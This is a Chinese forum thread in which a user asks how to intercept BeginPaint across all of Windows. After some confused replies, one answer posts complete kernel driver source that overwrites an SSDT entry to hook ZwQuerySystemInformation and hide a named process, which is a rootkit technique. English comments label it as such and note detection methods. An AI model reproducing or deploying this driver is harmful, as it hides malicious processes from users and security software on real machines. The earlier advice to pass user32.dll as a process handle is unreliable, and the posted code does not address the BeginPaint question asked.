user32.dll里有个API, BeginPaint。
我想让整个Window,不论是否是我的程序,只要使用了这个API就进到我指定的一个函数中,这个函数的参数,返回值都和原来的一样。能实现吗?而且在我的函数中可以调用原来的BeginPaint。也就是说我想在BeginPaint之前和之后做些事情。大侠,拜托了。
我想让整个Window,不论是否是我的程序,只要使用了这个API就进到我指定的一个函数中,这个函数的参数,返回值都和原来的一样。能实现吗?而且在我的函数中可以调用原来的BeginPaint。也就是说我想在BeginPaint之前和之后做些事情。大侠,拜托了。
先获得BeginPaint的地址,将其保存并用另一函数名mypaint,再将你的函数写到这个地址
你自己则调用mypaint,好像读写地址用
BOOL ReadProcessMemory(
HANDLE hProcess,
LPCVOID lpBaseAddress,
LPVOID lpBuffer,
SIZE_T nSize,
SIZE_T* lpNumberOfBytesRead
);
hProcess 就是user32.dll
读出来保存BOOL WriteProcessMemory(
HANDLE hProcess,
LPVOID lpBaseAddress,
LPCVOID lpBuffer,
SIZE_T nSize,
SIZE_T* lpNumberOfBytesWritten
);
再将你的写进来
估计你要是拦截了BeginPaint,Windows都不能运行了
{
// do something
HDC hdc = Old_BeginPaint(hwnd, lpPaint);
// do something
return hdc;
}windows还是可以运行的,是吧!
看了楼上的,还是一头雾水,能搞个代码看看吗?
#include "string.h"

// Control code the user-mode side sends to this device. METHOD_BUFFERED means the
// I/O manager hands the driver one kernel copy of the caller's buffer
// (Irp->AssociatedIrp.SystemBuffer) for both input and output.
#define IOCTL_EVENT_MSG CTL_CODE(FILE_DEVICE_UNKNOWN, 0x927, METHOD_BUFFERED , FILE_ANY_ACCESS)

// Undocumented NT structures describing what ZwQuerySystemInformation returns for
// information class 5 (process list). The field layout is tied to the kernel build
// this was written against; on another build the walk in
// HookZwQuerySystemInformation reads the wrong offsets -- confirm before use.
struct _SYSTEM_THREADS
{
    LARGE_INTEGER KernelTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER CreateTime;
    ULONG WaitTime;
    PVOID StartAddress;
    CLIENT_ID ClientIs;
    KPRIORITY Priority;
    KPRIORITY BasePriority;
    ULONG ContextSwitchCount;
    ULONG ThreadState;
    KWAIT_REASON WaitReason;
};

// One process entry. Entries are chained by NextEntryDelta (byte offset to the next
// entry, 0 on the last one) -- that offset is what the hook edits to unlink an entry.
struct _SYSTEM_PROCESSES
{
    ULONG NextEntryDelta;
    ULONG ThreadCount;
    ULONG Reserved[6];
    LARGE_INTEGER CreateTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER KernelTime;
    UNICODE_STRING ProcessName;        // compared against the hard-coded name in the hook
    KPRIORITY BasePriority;
    ULONG ProcessId;
    ULONG InheritedFromProcessId;
    ULONG HandleCount;
    ULONG Reserved2[2];
    VM_COUNTERS VmCounters;
    IO_COUNTERS IoCounters;
    struct _SYSTEM_THREADS Threads[1]; // placeholder for a trailing variable-length array (presumably ThreadCount entries)
};

// Layout of the kernel's system service descriptor table (SSDT). ServiceTableBase is
// the array of system-service function pointers that DriverEntry overwrites at a
// hard-coded index; NumberOfServices is never checked against that index here.
typedef struct _ServiceDescriptorEntry {
    unsigned int *ServiceTableBase;
    unsigned int *ServiceCounterTableBase;
    unsigned int NumberOfServices;
    unsigned char *ParamTableBase;
}ServiceDescriptorTableEntry, *PServiceDescriptorTableEntry;
//ULONG KeServiceDescriptorTable = 0x8046AB80;
// The commented-out line above is a raw address from one specific kernel build; the
// code instead binds to the symbol exported by the kernel.
extern PServiceDescriptorTableEntry KeServiceDescriptorTable;

// Signature of the original ZwQuerySystemInformation. The pointer saved from the
// SSDT before patching is kept in RealZwQuerySystemInformation so the hook can forward
// to it and DriverUnload can restore it.
typedef NTSTATUS (*REALZWQUERYSYSTEMINFORMATION)(
    IN ULONG SystemInformationClass,
    IN PVOID SystemInformation,
    IN ULONG SystemInformationLength,
    OUT PULONG ReturnLength);
REALZWQUERYSYSTEMINFORMATION RealZwQuerySystemInformation;

// Replacement routine installed into the SSDT by DriverEntry (defined below).
NTSTATUS HookZwQuerySystemInformation(
    IN ULONG SystemInformationClass,
    IN PVOID SystemInformation,
    IN ULONG SystemInformationLength,
    OUT PULONG ReturnLength);

// IRP dispatch routines for \Device\MyDriver.
static NTSTATUS MydrvDispatch (IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);
static NTSTATUS MydrvDispatchIoctl(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);
VOID DriverUnload (IN PDRIVER_OBJECT pDriverObject);
// Driver entry point. Creates \Device\MyDriver and the \??\MyDriver link, registers
// the dispatch routines, then redirects SSDT slot 0x97 (ZwQuerySystemInformation on the
// kernel build this targets) to HookZwQuerySystemInformation.
//
// Risk notes for anyone reviewing or responding to this code:
//  - The SSDT is a kernel-global table, so after this returns every process's
//    ZwQuerySystemInformation call runs the hook; this is the installation step of a
//    process-hiding rootkit, not a per-application hook.
//  - Index 0x97 is hard-coded and varies between kernel builds; on any other build an
//    unrelated system service is overwritten. NumberOfServices is not checked.
//  - Nothing synchronizes the patch with callers on other CPUs, and on 64-bit Windows
//    kernel patch protection bugchecks the machine when the table is modified.
//  - Detection: an SSDT integrity check that flags entries pointing outside the kernel
//    image will show slot 0x97 resolving into this driver.
// RegistryPath is unused. Returns STATUS_SUCCESS or the failing I/O manager status.
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
{
    UNICODE_STRING nameString, linkString;
    PDEVICE_OBJECT deviceObject;
    NTSTATUS status;
    WCHAR wBuffer[200];
    ULONG CR0VALUE;
    // These two assignments are overwritten by RtlInitUnicodeString below, so wBuffer
    // is never actually used as the string's storage.
    nameString.Buffer = wBuffer;
    nameString.MaximumLength = 200;
    DriverObject->DriverUnload = DriverUnload;
    RtlInitUnicodeString(&nameString, L"\\Device\\MyDriver");
    status = IoCreateDevice(
        DriverObject,
        0, // no device extension
        &nameString,
        FILE_DEVICE_UNKNOWN,
        0,
        TRUE,
        &deviceObject
        );
    if (!NT_SUCCESS( status ))
        return status;
    deviceObject->Flags |= DO_BUFFERED_IO;
    RtlInitUnicodeString(&linkString, L"\\??\\MyDriver");
    status = IoCreateSymbolicLink (&linkString, &nameString);
    if (!NT_SUCCESS( status ))
    {
        IoDeleteDevice (DriverObject->DeviceObject);
        return status;
    }
    DriverObject->MajorFunction[IRP_MJ_CREATE] = MydrvDispatch;
    DriverObject->MajorFunction[IRP_MJ_CLOSE] = MydrvDispatch;
    DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = MydrvDispatchIoctl;
    // Clear CR0 bit 16 (WP) so the read-only service table can be written; the
    // previous CR0 value is kept in CR0VALUE and restored after the two stores.
    __asm{
        mov eax, cr0
        mov CR0VALUE, eax
        and eax, 0fffeffffh
        mov cr0, eax
    }
    // Save the original service pointer, then replace it with the hook.
    RealZwQuerySystemInformation = (REALZWQUERYSYSTEMINFORMATION)(*(((PServiceDescriptorTableEntry)KeServiceDescriptorTable)->ServiceTableBase + 0x97));
    *(((PServiceDescriptorTableEntry)KeServiceDescriptorTable)->ServiceTableBase + 0x97) = HookZwQuerySystemInformation;
    __asm{
        mov eax, CR0VALUE
        mov cr0, eax
    }
    return STATUS_SUCCESS;
}
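// IRP_MJ_CREATE / IRP_MJ_CLOSE handler for \Device\MyDriver. Opening and closing a
// handle needs no per-handle state, so both are completed with STATUS_SUCCESS and no
// payload. Any other major function reaching this routine is a registration mistake
// and is completed with STATUS_INVALID_DEVICE_REQUEST rather than silently succeeding.
// Returns the same status that is stored in Irp->IoStatus.Status.
static NTSTATUS MydrvDispatch (IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
    NTSTATUS status;
    PIO_STACK_LOCATION irpSp;

    UNREFERENCED_PARAMETER(DeviceObject);

    // Current stack location carries the major function code for this request.
    irpSp = IoGetCurrentIrpStackLocation( Irp );
    switch (irpSp->MajorFunction)
    {
    case IRP_MJ_CREATE:
        DbgPrint("IRP_MJ_CREATE\n");
        status = STATUS_SUCCESS;
        break;
    case IRP_MJ_CLOSE:
        DbgPrint("IRP_MJ_CLOSE\n");
        status = STATUS_SUCCESS;
        break;
    default:
        status = STATUS_INVALID_DEVICE_REQUEST;
        break;
    }
    Irp->IoStatus.Status = status;
    Irp->IoStatus.Information = 0L;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return status;
}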
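// IRP_MJ_DEVICE_CONTROL handler. The only request understood is IOCTL_EVENT_MSG, which
// answers with the fixed string OutMsg in the caller's output buffer.
//
// METHOD_BUFFERED: Irp->AssociatedIrp.SystemBuffer is the single kernel copy used for
// both directions and is only as large as the bigger of the two lengths the caller
// passed to DeviceIoControl. Those lengths come from an arbitrary user-mode process,
// so the copy must be bounded by OutputBufferLength; the original code copied
// unconditionally, which let a small output buffer turn into a kernel pool overwrite.
//
// Returns STATUS_SUCCESS with Information = sizeof(OutMsg), STATUS_BUFFER_TOO_SMALL
// with Information = 0 when the caller's buffer cannot hold the message, and
// STATUS_INVALID_DEVICE_REQUEST for any other control code.
static NTSTATUS MydrvDispatchIoctl(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
    PIO_STACK_LOCATION IrpStack;
    NTSTATUS status;
    ULONG ControlCode;
    ULONG OutputLength;
    static const TCHAR OutMsg[] = "Message send by driver";

    UNREFERENCED_PARAMETER(DeviceObject);

    // Current stack location: control code and buffer lengths supplied by the caller.
    IrpStack = IoGetCurrentIrpStackLocation(Irp);
    ControlCode = IrpStack->Parameters.DeviceIoControl.IoControlCode;
    OutputLength = IrpStack->Parameters.DeviceIoControl.OutputBufferLength;

    switch (ControlCode)
    {
    case IOCTL_EVENT_MSG:
        // Untrusted length: refuse rather than write past SystemBuffer.
        if (OutputLength < sizeof(OutMsg))
        {
            status = STATUS_BUFFER_TOO_SMALL;
            Irp->IoStatus.Information = 0;
            break;
        }
        RtlCopyMemory(Irp->AssociatedIrp.SystemBuffer, OutMsg, sizeof(OutMsg));
        status = STATUS_SUCCESS;
        Irp->IoStatus.Information = sizeof(OutMsg);
        break;
    default:
        status = STATUS_INVALID_DEVICE_REQUEST;
        Irp->IoStatus.Information = 0;
        break;
    }
    Irp->IoStatus.Status = status;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return status;
}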
// Unload routine: removes the symbolic link and device, then writes the saved original
// pointer back into SSDT slot 0x97.
// Note: the CR0 write-protect handling that DriverEntry does around its table store is
// not repeated here, and nothing waits for threads that are still executing inside
// HookZwQuerySystemInformation, so unloading can fault. For incident response a reboot
// is the safer way to get rid of a driver like this than unloading it.
VOID DriverUnload (IN PDRIVER_OBJECT pDriverObject)
{
    UNICODE_STRING nameString;
    RtlInitUnicodeString(&nameString, L"\\??\\MyDriver");
    IoDeleteSymbolicLink(&nameString);
    IoDeleteDevice(pDriverObject->DeviceObject);
    *(((PServiceDescriptorTableEntry)KeServiceDescriptorTable)->ServiceTableBase + 0x97) = RealZwQuerySystemInformation;
    return;
}

// Replacement for ZwQuerySystemInformation, installed system-wide by DriverEntry.
// Forwards every call to the original service; when that succeeded and the class is 5
// (SystemProcessInformation), walks the returned _SYSTEM_PROCESSES chain and unlinks
// every entry whose ProcessName equals "TestDriver.EXE" (case-insensitive -- third
// argument of RtlCompareUnicodeString) by adjusting the previous entry's
// NextEntryDelta. The caller therefore never sees that process.
//
// This is the process-hiding primitive of a rootkit: every consumer of this service
// (Task Manager, tasklist, user-mode agents of security products) is affected, and the
// hidden name is hard-coded. It runs in the context of whichever process made the
// call, on that caller's buffer, with no exception handling, so any fault here brings
// the whole system down.
// Detection: a cross-view comparison (the list this service returns versus another
// enumeration path) exposes the missing entry; an SSDT integrity check shows slot
// 0x97 pointing into this driver's image.
// Returns the status of the original call unchanged.
NTSTATUS HookZwQuerySystemInformation(
    IN ULONG SystemInformationClass,
    IN PVOID SystemInformation,
    IN ULONG SystemInformationLength,
    OUT PULONG ReturnLength)
{
    NTSTATUS rc; UNICODE_STRING process_name;
    RtlInitUnicodeString(&process_name, L"TestDriver.EXE");
    // Let the real service fill the caller's buffer first.
    rc = (RealZwQuerySystemInformation) (
        SystemInformationClass,
        SystemInformation,
        SystemInformationLength,
        ReturnLength);
    if(NT_SUCCESS(rc))
    {
        if(5 == SystemInformationClass)
        {
            struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
            struct _SYSTEM_PROCESSES *prev = NULL;
            // The very first entry is stepped over without being compared.
            if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta); while(curr)
            {
                if (RtlCompareUnicodeString(&process_name, &curr->ProcessName, 1) == 0)
                { if(prev)
                    {
                        // Splice the matching entry out by extending the previous delta
                        // over it; a zero delta marks the end of the chain.
                        if(curr->NextEntryDelta)
                        {
                            prev->NextEntryDelta += curr->NextEntryDelta;
                        }
                        else
                        {
                            prev->NextEntryDelta = 0;
                        }
                    }
                    else
                    {
                        // No previous entry: only the local SystemInformation pointer
                        // is moved here, which the caller does not observe.
                        if(curr->NextEntryDelta)
                        {
                            (char *)SystemInformation += curr->NextEntryDelta;
                        }
                        else
                        {
                            SystemInformation = NULL;
                        }
                    } if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta);
                    else
                    {
                        curr = NULL;
                        break;
                    }
                } if(curr != NULL)
                {
                    prev = curr;
                    if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta);
                    else curr = NULL;
                } } // end while(curr)
        }
    }
    return rc;
} // Hope this helps!
高手救救我!!!